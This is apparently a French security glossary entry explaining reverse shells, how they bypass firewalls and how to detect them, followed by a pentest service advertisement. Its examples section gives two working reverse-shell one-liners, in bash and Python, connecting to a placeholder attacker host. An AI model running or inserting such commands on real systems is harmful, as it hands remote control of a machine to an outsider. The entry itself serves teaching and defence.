Reverse Shell
hackingDéfinition
Technique où la machine compromise initie une connexion sortante vers l'attaquant, contournant les pare-feux qui bloquent les connexions entrantes. Fondamental en post-exploitation.
Principe
Contrairement au bind shell (la machine écoute), le reverse shell (la machine se connecte à l'attaquant) traverse la plupart des pare-feux car la connexion est sortante (souvent sur les ports 80, 443 autorisés).
Exemples classiques
# Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Python
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'Détection
- Monitoring des connexions sortantes inhabituelles
- Analyse des processus enfants de services web
- EDR avec détection comportementale
Besoin d'un expert sur ce sujet ?
Audit, pentest, conformité ISO 27001, développement IA sécurisé — demandez un devis gratuit.
Demander un devis